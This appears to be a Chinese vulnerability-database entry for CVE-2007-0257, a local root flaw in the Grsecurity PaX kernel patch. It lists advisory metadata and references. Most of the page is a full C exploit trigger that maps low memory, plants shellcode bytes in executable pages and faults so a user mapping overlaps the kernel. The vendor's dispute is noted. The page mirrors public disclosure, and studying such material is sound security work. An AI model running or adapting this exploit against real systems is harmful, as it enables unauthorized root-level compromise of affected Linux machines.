Grsecurity内核PaX本地权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111785 漏洞类型 Unknown
发布时间 2006-12-18 更新时间 2007-03-09
CVE编号 CVE-2007-0257 CNNVD-ID CNNVD-200701-238
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/29446
https://www.securityfocus.com/bid/22014
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-238
|漏洞详情
GrsecurityLinux是一款开放源代码操作系统。Grsecurity的expand_stack()函数实现上存在漏洞,本地攻击者可能利用此漏洞以root用户权限执行任意指令。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/22014/info

Grsecurity Kernel PaX is prone to a local privilege-escalation vulnerability. 

An attacker can exploit this issue to obtain superuser privileges. A successful attack can result in the complete compromise of the affected computer.

NOTE: The vendor disputes the issue, stating that the application is not vulnerable.

Digital Armaments has provided an exploit and updated advisory outlining specific details of this vulnerability. Please see the reference section for further information.
*/

/*
** expand_stack() PaX local root vulnerability
** Vulnerability trigger.
**
** Copyright (C) 2007
** Digital Armaments Inc. - www.digitalarmaments.com
*/

#define _GNU_SOURCE
#include <unistd.h>
#include <signal.h>
#include <stdio.h>
#include <sched.h>
#include <fcntl.h>
#include <asm/page.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/wait.h>

#define KBASE 0xc0000000
#define SEGMEXEC_TASK_SIZE (KBASE / 2)

#define LOSTPAGE_SIZE (PAGE_SIZE * 3)
#define MAP1_BASE 0x00004000
#define MAP2_BASE MAP1_BASE - LOSTPAGE_SIZE
#define PF_BASE MAP1_BASE + SEGMEXEC_TASK_SIZE - 0x4000

#define PAGE_GROW_NB 10

static char ucode [40] = "\xbe\x00\xF0\xFF\x5F\x83\x3e\x2a";

void mouarf (int signum)
{
char * str = (char *) (MAP1_BASE + 600);

memset ((void *)(MAP1_BASE + 600), 0x90, 40);
str [26] = 0xc3; /* ret */
return;
}

int main( void )
{
int i = 1;
void (* p)();

signal (SIGBUS, mouarf);

if( mmap( (void *) MAP1_BASE, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED |
MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN, 0, 0 ) == (void *) -1 )
{
perror( "mmap map1 base\n" );
return( 1 );
}

if( mmap( (void *) 0x0, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED |
MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN, 0, 0 ) == (void *) -1 )
{
perror( "mmap 0x0 failed\n" );
return( 1 );
}

if( mprotect( (void *) MAP1_BASE, PAGE_SIZE,
PROT_READ | PROT_WRITE | PROT_EXEC ) < 0 )
{
perror( "mprotect map1 base" );
fprintf( stderr, "run chpax -m on this executable\n" );
return( 1 );
}

* (int *) (ucode + 1) = (SEGMEXEC_TASK_SIZE - (PAGE_SIZE * i));
memcpy ((void *)(MAP1_BASE + 600), ucode, 20);
p = (void *) MAP1_BASE + 600;
printf ("--> about to fault on %X\n", SEGMEXEC_TASK_SIZE - (PAGE_SIZE * i));
p ();
printf ("Overlaping the kernel by %d pages\n", i);

fflush( stdout );

printf ("Calling munmap ... %X, %x\n", 0x2000, 0x1000);
if (munmap (0x2000, 0x1000) < 0 )
perror ("munmap");

// printf ("Calling mremap ... \n");
// if (mremap (0x2000, 0x1000, 0x10000, MREMAP_MAYMOVE) < 0 )
// perror ("mremap");

printf ("PID:%d, sleeping\n", getpid ());
sleep (2000);
return( 0 );
}
|受影响的产品
grsecurity grsecurity Kernel Patch 2.1.8 grsecurity grsecurity Kernel Patch 2.1.7 grsecurity grsecurity Kernel Patch 2.1.6 grsecurity grsecurity Kernel Patch 2.1.5 grsecurity grsecurity K
|参考资料

来源:BID
名称:22014
链接:http://www.securityfocus.com/bid/22014
来源:BUGTRAQ
名称:20070309Re:DigitalArmamentsSecurityAdvisory20.01.2007:GrsecurityKernelPaXVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/462302/100/100/threaded
来源:BUGTRAQ
名称:20070120DigitalArmamentsSecurityAdvisory20.01.2007:GrsecurityKernelPaXVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/457509/100/0/threaded
来源:BUGTRAQ
名称:20070112Lies?[Was:Re:DigitalArmamentsSecurityPre-Advisory11.01.2007:GrsecurityKernelPaX-Localrootvulnerability]
链接:http://www.securityfocus.com/archive/1/archive/1/456722/100/0/threaded
来源:BUGTRAQ
名称:20070111DigitalArmamentsSecurityPre-Advisory11.01.2007:GrsecurityKernelPaX-Localrootvulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/456626/100/0/threaded
来源:VUPEN
名称:ADV-2007-0155
链接:http://www.frsirt.com/english/advisories/2007/0155
来源:MISC
链接:http://www.digitalarmaments.com/pre2007-00018659.html
来源:MISC
链接:http://www.digitalarmaments.com/news_news.shtml
来源